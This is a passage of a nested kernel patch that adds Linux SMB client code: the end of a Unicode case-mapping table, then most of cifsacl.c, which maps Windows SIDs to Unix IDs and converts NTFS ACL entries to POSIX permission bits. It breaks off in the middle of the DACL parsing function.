++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e50-1e5f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e60-1e6f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e70-1e7f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e80-1e8f */
++	1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,	/* 1e90-1e9f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ea0-1eaf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1eb0-1ebf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ec0-1ecf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ed0-1edf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ee0-1eef */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f00-1f0f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f10-1f1f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f20-1f2f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f30-1f3f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f40-1f4f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, -8, 0, -8, 0, -8, 0, -8,	/* 1f50-1f5f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f60-1f6f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f70-1f7f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f80-1f8f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f90-1f9f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1fa0-1faf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -74, -74, -9, 0, 0, 0,	/* 1fb0-1fbf */
++	0, 0, 0, 0, 0, 0, 0, 0, -86, -86, -86, -86, -9, 0, 0, 0,	/* 1fc0-1fcf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -100, -100, 0, 0, 0, 0,	/* 1fd0-1fdf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -112, -112, -7, 0, 0, 0,	/* 1fe0-1fef */
++	0, 0, 0, 0, 0, 0, 0, 0,
++};
++
++/* Lower case range - Wide latin */
++static signed char UniCaseRangeLff20[27] = {
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* ff20-ff2f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++};
++
++/*
++ * Lower Case Range
++ */
++const struct UniCaseRange CifsUniLowerRange[] = {
++	{0x0380, 0x03ab, UniCaseRangeL0380},
++	{0x0400, 0x042f, UniCaseRangeL0400},
++	{0x0490, 0x04cb, UniCaseRangeL0490},
++	{0x1e00, 0x1ff7, UniCaseRangeL1e00},
++	{0xff20, 0xff3a, UniCaseRangeLff20},
++	{0}
++};
++#endif
+diff --git a/fs/smb/client/cifsacl.c b/fs/smb/client/cifsacl.c
+new file mode 100644
+index 0000000000000..a6c7566a01821
+--- /dev/null
++++ b/fs/smb/client/cifsacl.c
+@@ -0,0 +1,1672 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2007,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Contains the routines for mapping CIFS/NTFS ACLs
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <linux/string.h>
++#include <linux/keyctl.h>
++#include <linux/key-type.h>
++#include <keys/user-type.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsacl.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "fs_context.h"
++
++/* security id for everyone/world system group */
++static const struct cifs_sid sid_everyone = {
++	1, 1, {0, 0, 0, 0, 0, 1}, {0} };
++/* security id for Authenticated Users system group */
++static const struct cifs_sid sid_authusers = {
++	1, 1, {0, 0, 0, 0, 0, 5}, {cpu_to_le32(11)} };
++
++/* S-1-22-1 Unmapped Unix users */
++static const struct cifs_sid sid_unix_users = {1, 1, {0, 0, 0, 0, 0, 22},
++		{cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-22-2 Unmapped Unix groups */
++static const struct cifs_sid sid_unix_groups = { 1, 1, {0, 0, 0, 0, 0, 22},
++		{cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/*
++ * See https://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
++ */
++
++/* S-1-5-88 MS NFS and Apple style UID/GID/mode */
++
++/* S-1-5-88-1 Unix uid */
++static const struct cifs_sid sid_unix_NFS_users = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-5-88-2 Unix gid */
++static const struct cifs_sid sid_unix_NFS_groups = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-5-88-3 Unix mode */
++static const struct cifs_sid sid_unix_NFS_mode = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(3), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++static const struct cred *root_cred;
++
++static int
++cifs_idmap_key_instantiate(struct key *key, struct key_preparsed_payload *prep)
++{
++	char *payload;
++
++	/*
++	 * If the payload is less than or equal to the size of a pointer, then
++	 * an allocation here is wasteful. Just copy the data directly to the
++	 * payload.value union member instead.
++	 *
++	 * With this however, you must check the datalen before trying to
++	 * dereference payload.data!
++	 */
++	if (prep->datalen <= sizeof(key->payload)) {
++		key->payload.data[0] = NULL;
++		memcpy(&key->payload, prep->data, prep->datalen);
++	} else {
++		payload = kmemdup(prep->data, prep->datalen, GFP_KERNEL);
++		if (!payload)
++			return -ENOMEM;
++		key->payload.data[0] = payload;
++	}
++
++	key->datalen = prep->datalen;
++	return 0;
++}
++
++static inline void
++cifs_idmap_key_destroy(struct key *key)
++{
++	if (key->datalen > sizeof(key->payload))
++		kfree(key->payload.data[0]);
++}
++
++static struct key_type cifs_idmap_key_type = {
++	.name        = "cifs.idmap",
++	.instantiate = cifs_idmap_key_instantiate,
++	.destroy     = cifs_idmap_key_destroy,
++	.describe    = user_describe,
++};
++
++static char *
++sid_to_key_str(struct cifs_sid *sidptr, unsigned int type)
++{
++	int i, len;
++	unsigned int saval;
++	char *sidstr, *strptr;
++	unsigned long long id_auth_val;
++
++	/* 3 bytes for prefix */
++	sidstr = kmalloc(3 + SID_STRING_BASE_SIZE +
++			 (SID_STRING_SUBAUTH_SIZE * sidptr->num_subauth),
++			 GFP_KERNEL);
++	if (!sidstr)
++		return sidstr;
++
++	strptr = sidstr;
++	len = sprintf(strptr, "%cs:S-%hhu", type == SIDOWNER ? 'o' : 'g',
++			sidptr->revision);
++	strptr += len;
++
++	/* The authority field is a single 48-bit number */
++	id_auth_val = (unsigned long long)sidptr->authority[5];
++	id_auth_val |= (unsigned long long)sidptr->authority[4] << 8;
++	id_auth_val |= (unsigned long long)sidptr->authority[3] << 16;
++	id_auth_val |= (unsigned long long)sidptr->authority[2] << 24;
++	id_auth_val |= (unsigned long long)sidptr->authority[1] << 32;
++	id_auth_val |= (unsigned long long)sidptr->authority[0] << 48;
++
++	/*
++	 * MS-DTYP states that if the authority is >= 2^32, then it should be
++	 * expressed as a hex value.
++	 */
++	if (id_auth_val <= UINT_MAX)
++		len = sprintf(strptr, "-%llu", id_auth_val);
++	else
++		len = sprintf(strptr, "-0x%llx", id_auth_val);
++
++	strptr += len;
++
++	for (i = 0; i < sidptr->num_subauth; ++i) {
++		saval = le32_to_cpu(sidptr->sub_auth[i]);
++		len = sprintf(strptr, "-%u", saval);
++		strptr += len;
++	}
++
++	return sidstr;
++}
++
++/*
++ * if the two SIDs (roughly equivalent to a UUID for a user or group) are
++ * the same returns zero, if they do not match returns non-zero.
++ */
++static int
++compare_sids(const struct cifs_sid *ctsid, const struct cifs_sid *cwsid)
++{
++	int i;
++	int num_subauth, num_sat, num_saw;
++
++	if ((!ctsid) || (!cwsid))
++		return 1;
++
++	/* compare the revision */
++	if (ctsid->revision != cwsid->revision) {
++		if (ctsid->revision > cwsid->revision)
++			return 1;
++		else
++			return -1;
++	}
++
++	/* compare all of the six auth values */
++	for (i = 0; i < NUM_AUTHS; ++i) {
++		if (ctsid->authority[i] != cwsid->authority[i]) {
++			if (ctsid->authority[i] > cwsid->authority[i])
++				return 1;
++			else
++				return -1;
++		}
++	}
++
++	/* compare all of the subauth values if any */
++	num_sat = ctsid->num_subauth;
++	num_saw = cwsid->num_subauth;
++	num_subauth = num_sat < num_saw ? num_sat : num_saw;
++	if (num_subauth) {
++		for (i = 0; i < num_subauth; ++i) {
++			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
++				if (le32_to_cpu(ctsid->sub_auth[i]) >
++					le32_to_cpu(cwsid->sub_auth[i]))
++					return 1;
++				else
++					return -1;
++			}
++		}
++	}
++
++	return 0; /* sids compare/match */
++}
++
++static bool
++is_well_known_sid(const struct cifs_sid *psid, uint32_t *puid, bool is_group)
++{
++	int i;
++	int num_subauth;
++	const struct cifs_sid *pwell_known_sid;
++
++	if (!psid || (puid == NULL))
++		return false;
++
++	num_subauth = psid->num_subauth;
++
++	/* check if Mac (or Windows NFS) vs. Samba format for Unix owner SID */
++	if (num_subauth == 2) {
++		if (is_group)
++			pwell_known_sid = &sid_unix_groups;
++		else
++			pwell_known_sid = &sid_unix_users;
++	} else if (num_subauth == 3) {
++		if (is_group)
++			pwell_known_sid = &sid_unix_NFS_groups;
++		else
++			pwell_known_sid = &sid_unix_NFS_users;
++	} else
++		return false;
++
++	/* compare the revision */
++	if (psid->revision != pwell_known_sid->revision)
++		return false;
++
++	/* compare all of the six auth values */
++	for (i = 0; i < NUM_AUTHS; ++i) {
++		if (psid->authority[i] != pwell_known_sid->authority[i]) {
++			cifs_dbg(FYI, "auth %d did not match\n", i);
++			return false;
++		}
++	}
++
++	if (num_subauth == 2) {
++		if (psid->sub_auth[0] != pwell_known_sid->sub_auth[0])
++			return false;
++
++		*puid = le32_to_cpu(psid->sub_auth[1]);
++	} else /* 3 subauths, ie Windows/Mac style */ {
++		*puid = le32_to_cpu(psid->sub_auth[0]);
++		if ((psid->sub_auth[0] != pwell_known_sid->sub_auth[0]) ||
++		    (psid->sub_auth[1] != pwell_known_sid->sub_auth[1]))
++			return false;
++
++		*puid = le32_to_cpu(psid->sub_auth[2]);
++	}
++
++	cifs_dbg(FYI, "Unix UID %d returned from SID\n", *puid);
++	return true; /* well known sid found, uid returned */
++}
++
++static __u16
++cifs_copy_sid(struct cifs_sid *dst, const struct cifs_sid *src)
++{
++	int i;
++	__u16 size = 1 + 1 + 6;
++
++	dst->revision = src->revision;
++	dst->num_subauth = min_t(u8, src->num_subauth, SID_MAX_SUB_AUTHORITIES);
++	for (i = 0; i < NUM_AUTHS; ++i)
++		dst->authority[i] = src->authority[i];
++	for (i = 0; i < dst->num_subauth; ++i)
++		dst->sub_auth[i] = src->sub_auth[i];
++	size += (dst->num_subauth * 4);
++
++	return size;
++}
++
++static int
++id_to_sid(unsigned int cid, uint sidtype, struct cifs_sid *ssid)
++{
++	int rc;
++	struct key *sidkey;
++	struct cifs_sid *ksid;
++	unsigned int ksid_size;
++	char desc[3 + 10 + 1]; /* 3 byte prefix + 10 bytes for value + NULL */
++	const struct cred *saved_cred;
++
++	rc = snprintf(desc, sizeof(desc), "%ci:%u",
++			sidtype == SIDOWNER ? 'o' : 'g', cid);
++	if (rc >= sizeof(desc))
++		return -EINVAL;
++
++	rc = 0;
++	saved_cred = override_creds(root_cred);
++	sidkey = request_key(&cifs_idmap_key_type, desc, "");
++	if (IS_ERR(sidkey)) {
++		rc = -EINVAL;
++		cifs_dbg(FYI, "%s: Can't map %cid %u to a SID\n",
++			 __func__, sidtype == SIDOWNER ? 'u' : 'g', cid);
++		goto out_revert_creds;
++	} else if (sidkey->datalen < CIFS_SID_BASE_SIZE) {
++		rc = -EIO;
++		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu)\n",
++			 __func__, sidkey->datalen);
++		goto invalidate_key;
++	}
++
++	/*
++	 * A sid is usually too large to be embedded in payload.value, but if
++	 * there are no subauthorities and the host has 8-byte pointers, then
++	 * it could be.
++	 */
++	ksid = sidkey->datalen <= sizeof(sidkey->payload) ?
++		(struct cifs_sid *)&sidkey->payload :
++		(struct cifs_sid *)sidkey->payload.data[0];
++
++	ksid_size = CIFS_SID_BASE_SIZE + (ksid->num_subauth * sizeof(__le32));
++	if (ksid_size > sidkey->datalen) {
++		rc = -EIO;
++		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu, ksid_size=%u)\n",
++			 __func__, sidkey->datalen, ksid_size);
++		goto invalidate_key;
++	}
++
++	cifs_copy_sid(ssid, ksid);
++out_key_put:
++	key_put(sidkey);
++out_revert_creds:
++	revert_creds(saved_cred);
++	return rc;
++
++invalidate_key:
++	key_invalidate(sidkey);
++	goto out_key_put;
++}
++
++int
++sid_to_id(struct cifs_sb_info *cifs_sb, struct cifs_sid *psid,
++		struct cifs_fattr *fattr, uint sidtype)
++{
++	int rc = 0;
++	struct key *sidkey;
++	char *sidstr;
++	const struct cred *saved_cred;
++	kuid_t fuid = cifs_sb->ctx->linux_uid;
++	kgid_t fgid = cifs_sb->ctx->linux_gid;
++
++	/*
++	 * If we have too many subauthorities, then something is really wrong.
++	 * Just return an error.
++	 */
++	if (unlikely(psid->num_subauth > SID_MAX_SUB_AUTHORITIES)) {
++		cifs_dbg(FYI, "%s: %u subauthorities is too many!\n",
++			 __func__, psid->num_subauth);
++		return -EIO;
++	}
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL) ||
++	    (cifs_sb_master_tcon(cifs_sb)->posix_extensions)) {
++		uint32_t unix_id;
++		bool is_group;
++
++		if (sidtype != SIDOWNER)
++			is_group = true;
++		else
++			is_group = false;
++
++		if (is_well_known_sid(psid, &unix_id, is_group) == false)
++			goto try_upcall_to_get_id;
++
++		if (is_group) {
++			kgid_t gid;
++			gid_t id;
++
++			id = (gid_t)unix_id;
++			gid = make_kgid(&init_user_ns, id);
++			if (gid_valid(gid)) {
++				fgid = gid;
++				goto got_valid_id;
++			}
++		} else {
++			kuid_t uid;
++			uid_t id;
++
++			id = (uid_t)unix_id;
++			uid = make_kuid(&init_user_ns, id);
++			if (uid_valid(uid)) {
++				fuid = uid;
++				goto got_valid_id;
++			}
++		}
++		/* If unable to find uid/gid easily from SID try via upcall */
++	}
++
++try_upcall_to_get_id:
++	sidstr = sid_to_key_str(psid, sidtype);
++	if (!sidstr)
++		return -ENOMEM;
++
++	saved_cred = override_creds(root_cred);
++	sidkey = request_key(&cifs_idmap_key_type, sidstr, "");
++	if (IS_ERR(sidkey)) {
++		cifs_dbg(FYI, "%s: Can't map SID %s to a %cid\n",
++			 __func__, sidstr, sidtype == SIDOWNER ? 'u' : 'g');
++		goto out_revert_creds;
++	}
++
++	/*
++	 * FIXME: Here we assume that uid_t and gid_t are same size. It's
++	 * probably a safe assumption but might be better to check based on
++	 * sidtype.
++	 */
++	BUILD_BUG_ON(sizeof(uid_t) != sizeof(gid_t));
++	if (sidkey->datalen != sizeof(uid_t)) {
++		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu)\n",
++			 __func__, sidkey->datalen);
++		key_invalidate(sidkey);
++		goto out_key_put;
++	}
++
++	if (sidtype == SIDOWNER) {
++		kuid_t uid;
++		uid_t id;
++		memcpy(&id, &sidkey->payload.data[0], sizeof(uid_t));
++		uid = make_kuid(&init_user_ns, id);
++		if (uid_valid(uid))
++			fuid = uid;
++	} else {
++		kgid_t gid;
++		gid_t id;
++		memcpy(&id, &sidkey->payload.data[0], sizeof(gid_t));
++		gid = make_kgid(&init_user_ns, id);
++		if (gid_valid(gid))
++			fgid = gid;
++	}
++
++out_key_put:
++	key_put(sidkey);
++out_revert_creds:
++	revert_creds(saved_cred);
++	kfree(sidstr);
++
++	/*
++	 * Note that we return 0 here unconditionally. If the mapping
++	 * fails then we just fall back to using the ctx->linux_uid/linux_gid.
++	 */
++got_valid_id:
++	rc = 0;
++	if (sidtype == SIDOWNER)
++		fattr->cf_uid = fuid;
++	else
++		fattr->cf_gid = fgid;
++	return rc;
++}
++
++int
++init_cifs_idmap(void)
++{
++	struct cred *cred;
++	struct key *keyring;
++	int ret;
++
++	cifs_dbg(FYI, "Registering the %s key type\n",
++		 cifs_idmap_key_type.name);
++
++	/* create an override credential set with a special thread keyring in
++	 * which requests are cached
++	 *
++	 * this is used to prevent malicious redirections from being installed
++	 * with add_key().
++	 */
++	cred = prepare_kernel_cred(NULL);
++	if (!cred)
++		return -ENOMEM;
++
++	keyring = keyring_alloc(".cifs_idmap",
++				GLOBAL_ROOT_UID, GLOBAL_ROOT_GID, cred,
++				(KEY_POS_ALL & ~KEY_POS_SETATTR) |
++				KEY_USR_VIEW | KEY_USR_READ,
++				KEY_ALLOC_NOT_IN_QUOTA, NULL, NULL);
++	if (IS_ERR(keyring)) {
++		ret = PTR_ERR(keyring);
++		goto failed_put_cred;
++	}
++
++	ret = register_key_type(&cifs_idmap_key_type);
++	if (ret < 0)
++		goto failed_put_key;
++
++	/* instruct request_key() to use this special keyring as a cache for
++	 * the results it looks up */
++	set_bit(KEY_FLAG_ROOT_CAN_CLEAR, &keyring->flags);
++	cred->thread_keyring = keyring;
++	cred->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
++	root_cred = cred;
++
++	cifs_dbg(FYI, "cifs idmap keyring: %d\n", key_serial(keyring));
++	return 0;
++
++failed_put_key:
++	key_put(keyring);
++failed_put_cred:
++	put_cred(cred);
++	return ret;
++}
++
++void
++exit_cifs_idmap(void)
++{
++	key_revoke(root_cred->thread_keyring);
++	unregister_key_type(&cifs_idmap_key_type);
++	put_cred(root_cred);
++	cifs_dbg(FYI, "Unregistered %s key type\n", cifs_idmap_key_type.name);
++}
++
++/* copy ntsd, owner sid, and group sid from a security descriptor to another */
++static __u32 copy_sec_desc(const struct cifs_ntsd *pntsd,
++				struct cifs_ntsd *pnntsd,
++				__u32 sidsoffset,
++				struct cifs_sid *pownersid,
++				struct cifs_sid *pgrpsid)
++{
++	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
++	struct cifs_sid *nowner_sid_ptr, *ngroup_sid_ptr;
++
++	/* copy security descriptor control portion */
++	pnntsd->revision = pntsd->revision;
++	pnntsd->type = pntsd->type;
++	pnntsd->dacloffset = cpu_to_le32(sizeof(struct cifs_ntsd));
++	pnntsd->sacloffset = 0;
++	pnntsd->osidoffset = cpu_to_le32(sidsoffset);
++	pnntsd->gsidoffset = cpu_to_le32(sidsoffset + sizeof(struct cifs_sid));
++
++	/* copy owner sid */
++	if (pownersid)
++		owner_sid_ptr = pownersid;
++	else
++		owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++				le32_to_cpu(pntsd->osidoffset));
++	nowner_sid_ptr = (struct cifs_sid *)((char *)pnntsd + sidsoffset);
++	cifs_copy_sid(nowner_sid_ptr, owner_sid_ptr);
++
++	/* copy group sid */
++	if (pgrpsid)
++		group_sid_ptr = pgrpsid;
++	else
++		group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++				le32_to_cpu(pntsd->gsidoffset));
++	ngroup_sid_ptr = (struct cifs_sid *)((char *)pnntsd + sidsoffset +
++					sizeof(struct cifs_sid));
++	cifs_copy_sid(ngroup_sid_ptr, group_sid_ptr);
++
++	return sidsoffset + (2 * sizeof(struct cifs_sid));
++}
++
++
++/*
++   change posix mode to reflect permissions
++   pmode is the existing mode (we only want to overwrite part of this
++   bits to set can be: S_IRWXU, S_IRWXG or S_IRWXO ie 00700 or 00070 or 00007
++*/
++static void access_flags_to_mode(__le32 ace_flags, int type, umode_t *pmode,
++				 umode_t *pdenied, umode_t mask)
++{
++	__u32 flags = le32_to_cpu(ace_flags);
++	/*
++	 * Do not assume "preferred" or "canonical" order.
++	 * The first DENY or ALLOW ACE which matches perfectly is
++	 * the permission to be used. Once allowed or denied, same
++	 * permission in later ACEs do not matter.
++	 */
++
++	/* If not already allowed, deny these bits */
++	if (type == ACCESS_DENIED) {
++		if (flags & GENERIC_ALL &&
++				!(*pmode & mask & 0777))
++			*pdenied |= mask & 0777;
++
++		if (((flags & GENERIC_WRITE) ||
++				((flags & FILE_WRITE_RIGHTS) == FILE_WRITE_RIGHTS)) &&
++				!(*pmode & mask & 0222))
++			*pdenied |= mask & 0222;
++
++		if (((flags & GENERIC_READ) ||
++				((flags & FILE_READ_RIGHTS) == FILE_READ_RIGHTS)) &&
++				!(*pmode & mask & 0444))
++			*pdenied |= mask & 0444;
++
++		if (((flags & GENERIC_EXECUTE) ||
++				((flags & FILE_EXEC_RIGHTS) == FILE_EXEC_RIGHTS)) &&
++				!(*pmode & mask & 0111))
++			*pdenied |= mask & 0111;
++
++		return;
++	} else if (type != ACCESS_ALLOWED) {
++		cifs_dbg(VFS, "unknown access control type %d\n", type);
++		return;
++	}
++	/* else ACCESS_ALLOWED type */
++
++	if ((flags & GENERIC_ALL) &&
++			!(*pdenied & mask & 0777)) {
++		*pmode |= mask & 0777;
++		cifs_dbg(NOISY, "all perms\n");
++		return;
++	}
++
++	if (((flags & GENERIC_WRITE) ||
++			((flags & FILE_WRITE_RIGHTS) == FILE_WRITE_RIGHTS)) &&
++			!(*pdenied & mask & 0222))
++		*pmode |= mask & 0222;
++
++	if (((flags & GENERIC_READ) ||
++			((flags & FILE_READ_RIGHTS) == FILE_READ_RIGHTS)) &&
++			!(*pdenied & mask & 0444))
++		*pmode |= mask & 0444;
++
++	if (((flags & GENERIC_EXECUTE) ||
++			((flags & FILE_EXEC_RIGHTS) == FILE_EXEC_RIGHTS)) &&
++			!(*pdenied & mask & 0111))
++		*pmode |= mask & 0111;
++
++	/* If DELETE_CHILD is set only on an owner ACE, set sticky bit */
++	if (flags & FILE_DELETE_CHILD) {
++		if (mask == ACL_OWNER_MASK) {
++			if (!(*pdenied & 01000))
++				*pmode |= 01000;
++		} else if (!(*pdenied & 01000)) {
++			*pmode &= ~01000;
++			*pdenied |= 01000;
++		}
++	}
++
++	cifs_dbg(NOISY, "access flags 0x%x mode now %04o\n", flags, *pmode);
++	return;
++}
++
++/*
++   Generate access flags to reflect permissions mode is the existing mode.
++   This function is called for every ACE in the DACL whose SID matches
++   with either owner or group or everyone.
++*/
++
++static void mode_to_access_flags(umode_t mode, umode_t bits_to_use,
++				__u32 *pace_flags)
++{
++	/* reset access mask */
++	*pace_flags = 0x0;
++
++	/* bits to use are either S_IRWXU or S_IRWXG or S_IRWXO */
++	mode &= bits_to_use;
++
++	/* check for R/W/X UGO since we do not know whose flags
++	   is this but we have cleared all the bits sans RWX for
++	   either user or group or other as per bits_to_use */
++	if (mode & S_IRUGO)
++		*pace_flags |= SET_FILE_READ_RIGHTS;
++	if (mode & S_IWUGO)
++		*pace_flags |= SET_FILE_WRITE_RIGHTS;
++	if (mode & S_IXUGO)
++		*pace_flags |= SET_FILE_EXEC_RIGHTS;
++
++	cifs_dbg(NOISY, "mode: %04o, access flags now 0x%x\n",
++		 mode, *pace_flags);
++	return;
++}
++
++static __u16 cifs_copy_ace(struct cifs_ace *dst, struct cifs_ace *src, struct cifs_sid *psid)
++{
++	__u16 size = 1 + 1 + 2 + 4;
++
++	dst->type = src->type;
++	dst->flags = src->flags;
++	dst->access_req = src->access_req;
++
++	/* Check if there's a replacement sid specified */
++	if (psid)
++		size += cifs_copy_sid(&dst->sid, psid);
++	else
++		size += cifs_copy_sid(&dst->sid, &src->sid);
++
++	dst->size = cpu_to_le16(size);
++
++	return size;
++}
++
++static __u16 fill_ace_for_sid(struct cifs_ace *pntace,
++			const struct cifs_sid *psid, __u64 nmode,
++			umode_t bits, __u8 access_type,
++			bool allow_delete_child)
++{
++	int i;
++	__u16 size = 0;
++	__u32 access_req = 0;
++
++	pntace->type = access_type;
++	pntace->flags = 0x0;
++	mode_to_access_flags(nmode, bits, &access_req);
++
++	if (access_type == ACCESS_ALLOWED && allow_delete_child)
++		access_req |= FILE_DELETE_CHILD;
++
++	if (access_type == ACCESS_ALLOWED && !access_req)
++		access_req = SET_MINIMUM_RIGHTS;
++	else if (access_type == ACCESS_DENIED)
++		access_req &= ~SET_MINIMUM_RIGHTS;
++
++	pntace->access_req = cpu_to_le32(access_req);
++
++	pntace->sid.revision = psid->revision;
++	pntace->sid.num_subauth = psid->num_subauth;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] = psid->authority[i];
++	for (i = 0; i < psid->num_subauth; i++)
++		pntace->sid.sub_auth[i] = psid->sub_auth[i];
++
++	size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth * 4);
++	pntace->size = cpu_to_le16(size);
++
++	return size;
++}
++
++
++#ifdef CONFIG_CIFS_DEBUG2
++static void dump_ace(struct cifs_ace *pace, char *end_of_acl)
++{
++	int num_subauth;
++
++	/* validate that we do not go past end of acl */
++
++	if (le16_to_cpu(pace->size) < 16) {
++		cifs_dbg(VFS, "ACE too small %d\n", le16_to_cpu(pace->size));
++		return;
++	}
++
++	if (end_of_acl < (char *)pace + le16_to_cpu(pace->size)) {
++		cifs_dbg(VFS, "ACL too small to parse ACE\n");
++		return;
++	}
++
++	num_subauth = pace->sid.num_subauth;
++	if (num_subauth) {
++		int i;
++		cifs_dbg(FYI, "ACE revision %d num_auth %d type %d flags %d size %d\n",
++			 pace->sid.revision, pace->sid.num_subauth, pace->type,
++			 pace->flags, le16_to_cpu(pace->size));
++		for (i = 0; i < num_subauth; ++i) {
++			cifs_dbg(FYI, "ACE sub_auth[%d]: 0x%x\n",
++				 i, le32_to_cpu(pace->sid.sub_auth[i]));
++		}
++
++		/* BB add length check to make sure that we do not have huge
++			num auths and therefore go off the end */
++	}
++
++	return;
++}
++#endif
++
++static void parse_dacl(struct cifs_acl *pdacl, char *end_of_acl,
++		       struct cifs_sid *pownersid, struct cifs_sid *pgrpsid,
++		       struct cifs_fattr *fattr, bool mode_from_special_sid)
++{
++	int i;
++	int num_aces = 0;
++	int acl_size;
++	char *acl_base;
++	struct cifs_ace **ppace;
++
++	/* BB need to add parm so we can store the SID BB */
++
++	if (!pdacl) {
++		/* no DACL in the security descriptor, set
++		   all the permissions for user/group/other */
++		fattr->cf_mode |= 0777;
++		return;
++	}
++
++	/* validate that we do not go past end of acl */
++	if (end_of_acl < (char *)pdacl + le16_to_cpu(pdacl->size)) {
++		cifs_dbg(VFS, "ACL too small to parse DACL\n");
++		return;
++	}
++
++	cifs_dbg(NOISY, "DACL revision %d size %d num aces %d\n",
++		 le16_to_cpu(pdacl->revision), le16_to_cpu(pdacl->size),
++		 le32_to_cpu(pdacl->num_aces));
++
++	/* reset rwx permissions for user/group/other.
++	   Also, if num_aces is 0 i.e. DACL has no ACEs,
++	   user/group/other have no permissions */
++	fattr->cf_mode &= ~(0777);
++
++	acl_base = (char *)pdacl;
++	acl_size = sizeof(struct cifs_acl);
++
++	num_aces = le32_to_cpu(pdacl->num_aces);
++	if (num_aces > 0) {
++		umode_t denied_mode = 0;
++
++		if (num_aces > ULONG_MAX / sizeof(struct cifs_ace *))
++			return;
++		ppace = kmalloc_array(num_aces, sizeof(struct cifs_ace *),
++				      GFP_KERNEL);
++		if (!ppace)
++			return;
++
++		for (i = 0; i < num_aces; ++i) {
++			ppace[i] = (struct cifs_ace *) (acl_base + acl_size);
++#ifdef CONFIG_CIFS_DEBUG2
++			dump_ace(ppace[i], end_of_acl);
++#endif
++			if (mode_from_special_sid &&
++			    (compare_sids(&(ppace[i]->sid),
++					  &sid_unix_NFS_mode) == 0)) {
++				/*
++				 * Full permissions are:
++				 * 07777 = S_ISUID | S_ISGID | S_ISVTX |
++				 *         S_IRWXU | S_IRWXG | S_IRWXO
++				 */
++				fattr->cf_mode &= ~07777;
++				fattr->cf_mode |=
++					le32_to_cpu(ppace[i]->sid.sub_auth[2]);
++				break;
++			} else {
++				if (compare_sids(&(ppace[i]->sid), pownersid) == 0) {
++					access_flags_to_mode(ppace[i]->access_req,
++							ppace[i]->type,
++							&fattr->cf_mode,
++							&denied_mode,
++							ACL_OWNER_MASK);
